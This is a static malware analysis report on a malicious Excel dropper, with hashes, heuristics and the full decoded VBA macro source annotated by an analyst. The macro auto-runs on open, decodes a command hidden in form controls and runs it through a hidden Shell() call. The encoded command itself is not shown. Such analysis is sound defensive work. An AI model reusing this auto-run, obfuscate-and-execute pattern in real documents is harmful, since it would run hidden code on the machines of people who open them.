Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 2f00e0bb89d863ee…

MALICIOUS

Office (OLE)

57.5 KB Created: 2019-01-28 14:28:24 Authoring application: Microsoft Excel Online First seen: 2019-05-16
MD5: bdc928e2064faf3950aef955c1c9fa8c SHA-1: 9f9d41aabb5e58d765f5ff4d930e6dab5fa2a613 SHA-256: 2f00e0bb89d863ee7834ae9cb69d98f8e826e6d328fcdd833d91d62634f675ce
180 Risk Score

Malware Insights

MITRE ATT&CK
T1566.001 Spearphishing Attachment T1059.005 Visual Basic

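The sample is an Excel document containing VBA macros. Its Workbook_Open macro runs automatically when the workbook is opened with macros enabled and, through a chain of helper routines (ExecuteMain → Document_create → MaxNumber → infor_Change → ChangeText), reaches a Shell() call, which indicates an attempt to execute arbitrary code. The string passed to Shell() is assembled at run time from text stored in UserForm controls, so the command itself does not appear in the extracted macro source below. The document body contains a lure suggesting the user enable editing and content, which is a common social engineering tactic for macro-enabled malicious documents. The ClamAV detection name 'Doc.Dropper.Agent-6847589-0' further supports its nature as a dropper.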

Heuristics 4

  • ClamAV: Doc.Dropper.Agent-6847589-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Dropper.Agent-6847589-0
  • VBA macros detected medium 2 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • Shell() call in VBA critical OLE_VBA_SHELL
    Shell() call in VBA
  • Workbook_Open macro high OLE_VBA_WBOPEN
    Workbook_Open macro

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename | Kind | Source | Size
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 3443 bytes
SHA-256: 8950ec06a5ed5ac0189f8374dd1489ba8cb03334d2c2328898750d765d7165c6
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisWorkbook"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
' Auto-run entry point (the OLE_VBA_WBOPEN finding): Workbook_Open is the
' workbook's open-event handler, so it runs once macros are enabled.
' Analyst note: the handler only forwards to ExecuteMain; the Shell() call
' lives in ChangeText (Module1), several calls away from this entry point.
Sub Workbook_Open()

ExecuteMain
End Sub

Attribute VB_Name = "Sheet1"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Attribute VB_Name = "Form1"
Attribute VB_Base = "0{A1977BFD-6F3F-4AFB-92DE-8E81EFB7600A}{E02E71D8-71BD-420B-B9F7-8AA120AC36C8}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False


' Click handler on Form1. It forwards to FormatText, which calls
' Document_create - the same routine the Workbook_Open path reaches.
' Analyst note: this is a second way into the decode-and-run chain.
Private Sub CommandButton2_Click()
FormatText
End Sub

' Change handler for the Form1 control "infor". MaxNumber assigns the
' assembled text to Form1.infor, and this handler passes that text on to
' ChangeText when it is shorter than 765 characters.
' Analyst note: together with the "> 760" test in ChangeText, only text of
' 761-764 characters reaches Shell(). The execution step is driven by a control
' event rather than a direct call, so it is easy to miss when following calls.
Private Sub infor_Change()
Dim hy As Integer
' Length of the text currently held by the control.
hy = Len(Form1.infor.Text)
If hy < 765 Then
' Hands the control text to the routine that contains the Shell() call.
ChangeText Form1.infor.Text
End If
End Sub

' Empty Change handler for the Form1 control "EditSum"; it does nothing.
' Analyst note: the control itself matters - LongMul and LockWideString read
' Form1.EditSum as the lookup alphabet for decoding.
Private Sub EditSum_Change()

End Sub

' Change handler for Form1.TextBox1. It sets the control's MaxLength to every
' value from 0 to 21300 and produces nothing that other routines read.
' NOTE(review): looks like filler or delay work triggered by the TextBox1
' assignments in MaxNumber - confirm in dynamic analysis.
Private Sub TextBox1_Change()
Dim i As Integer
For i = 0 To 21300
Form1.TextBox1.MaxLength = i
Next i
End Sub

' Empty Click handler; it does nothing in this listing.
Private Sub CompareTextReals_Click()

End Sub





Attribute VB_Name = "Module1"

' Module-level state shared by the routines below.
' ClearText: decoded form of Form1.TextReal (set in Document_create).
Dim ClearText As String

' ColNum: incremented by LongMul on every successful lookup; never read in
' this listing.
Dim ColNum As Integer
' stripText: decoded form of Form1.Label1 (set in Document_create).
Dim stripText As String

' Decodes two text values stored on Form1 (TextReal and Label1) with
' RenameText, saves the results in ClearText and stripText, then calls
' MaxNumber(0), which assembles and triggers the final string.
' Analyst note: the encoded input lives in the UserForm's control values, not
' in the macro source, so string scans of the VBA text alone will not show it.
Sub Document_create()
' RenameText takes its position counter ByRef and starts at character 1.
CountSym = 1
'Dim level As String
With Form1
DT = ""
' First pass: decode the TextReal control into DT.
RenameText CountSym, DT, .TextReal
ClearText = DT
' Reset the accumulator and counter before the second pass.
DT = ""
CountSym = 1
'Chars_Replace Form1.TextReal, level
' Second pass: decode the Label1 control into DT.
RenameText CountSym, DT, .Label1
stripText = DT
End With
' Length gate and trigger; 0 selects the branch that assigns Form1.infor.
MaxNumber (0)
End Sub

' Looks up the 1-based position of character Ar1 in Form1.EditSum.
' Ar1: the character to find.
' Ar2: receives the position; stays 0 when LongMul finds no match.
Sub morningDw(Ar1, ByRef Ar2)
Ar2 = 0
' LongMul scans upward from position 1.
a0 = 1
LongMul a0, Ar2, Ar1
End Sub

' Wrapper reached from CommandButton2_Click; runs Document_create.
Sub FormatText()
' DD is assigned here and not used again in this routine.
DD = 141
Document_create
End Sub

' Length gate and trigger. Continues only when the two decoded strings total
' exactly 320 characters. With qw = 0 it then assigns
' ClearText + Label2.Caption + stripText to Form1.infor.
' qw: 0 selects the assignment branch; Document_create always passes 0.
' Analyst notes:
'  - There is no Shell() call here. The .infor assignment is handled by
'    infor_Change, which calls ChangeText, and that is where Shell() sits.
'  - The 320 check here and the 760/765 checks downstream mean nothing runs if
'    the form's stored text has been altered or only partly recovered.
'  - The middle of the final string comes from Label2.Caption without decoding.
Sub MaxNumber(qw)
Dim ln As Integer
' ris is declared and not used in this routine.
Dim ris As Double
With Form1
ln = Len(ClearText) + Len(stripText)
' Panda is assigned and not used in this routine.
Panda = "dvfert36tge4tgf"
'Shemf Text, si - 2400 - 16
If ln = 320 Then
'MsgBox (ClearText)
If 0 = qw Then
s1 = "1"
s2 = "2"
' Repeatedly toggles TextBox1 between "1" and "2"; TextBox1_Change is the
' handler for that control. NOTE(review): appears to be delay or filler.
For j = 0 To 240
.TextBox1 = s1
.TextBox1 = s2
Next j
' Assembles the final string and stores it in the infor control.
.infor = ClearText + .Label2.Caption + stripText
'.EditSum = res
End If
' s2 is only assigned in the qw = 0 branch above.
For j = 0 To 170
.TextBox1 = s2
Next j
End If
'Form1.Show
End With
End Sub

' Returns the single character of Form1.EditSum at a 1-based position,
' wrapping around from the end when the position is below 1.
' pointer: requested position; RenameText passes (found position - 6).
' r1: receives the one-character result.
Sub LockWideString(pointer, ByRef r1)
Dim N1 As Integer
N1 = 1
If pointer < N1 Then
' Position 0 or negative: count back from the end of EditSum. A character
' that was not found (position 0, so pointer = -6) also lands here.
r1 = Right(Left(Form1.EditSum, Len(Form1.EditSum) + pointer), N1)
Else
' Right(Left(s, p), 1) picks the character at position p.
r1 = Right(Left(Form1.EditSum, pointer), N1)
End If
End Sub

' Execution sink (the OLE_VBA_SHELL finding): passes data1 to Shell() when it
' is longer than 760 characters.
' data1: the text taken from Form1.infor by infor_Change.
' Analyst notes:
'  - "zer" is never assigned in this listing, so m * zer evaluates to 0. The
'    second Shell argument is the window style, and 0 is vbHide (hidden).
'  - The command string is not in the macro source; recover it from the
'    form's stored control values or by logging the Shell argument in a sandbox.
Sub ChangeText(data1)
m = Len(data1)
If m > 760 Then Shell data1, m * zer
End Sub

' Recursive decoder: handles the character of FET at position CountSym,
' appends the decoded character to Build, then calls itself for the next one.
' CountSym: 1-based position, advanced in place (ByRef).
' Build: accumulator that receives the decoded text (ByRef).
' FET: the encoded text, supplied from a Form1 control by Document_create.
' Analyst note: each character is replaced by the one 6 positions earlier in
' Form1.EditSum, wrapping at the start. That is a fixed-shift substitution over
' an alphabet stored in the form.
Sub RenameText(ByRef CountSym, ByRef Build, FET)
Dim n As Integer
'LockWideString imemo - 2, st
n = Len(FET)
If CountSym <= n Then
'Sheet2.Cells(CountSym, 1) = ch
' Right(Left(FET, CountSym), 1) isolates the character at CountSym.
ch1 = Left(FET, CountSym)
imemo = 1
ch = Right(ch1, 1)
' imemo becomes the position of ch in EditSum (0 when not found).
morningDw ch, imemo
st = ""
' Fetch the replacement character 6 positions earlier in EditSum.
LockWideString imemo - 6, st
CountSym = CountSym + 1
Build = Build + st
' One recursion level per input character.
RenameText CountSym, Build, FET
End If
End Sub

' Called by Workbook_Open; forwards to Document_create and does nothing else.
Sub ExecuteMain()
Document_create
End Sub

' Recursive linear search for character ACIT in Form1.EditSum. Despite the
' name, it performs no multiplication.
' b1: 1-based position to test, advanced in place (ByRef).
' control: receives the matching position; left unchanged when the search
'          runs past the end of EditSum.
' ACIT: the character to find.
Sub LongMul(ByRef b1, ByRef control, ACIT)
' div is not declared at module level, so this counter is local to each call
' and has no effect on the result.
div = div + 1
If b1 <= Len(Form1.EditSum) Then
'Sheet1.Cells(ColNum, b1 + 2 + 3) = b
' Character of EditSum at position b1.
b = Right(Left(Form1.EditSum, b1), 1)
If ACIT <> b Then
b1 = b1 + 1
LongMul b1, control, ACIT
Else
control = b1
' Module-level match counter; not read anywhere in this listing.
ColNum = 1 + ColNum
End If
End If
End Sub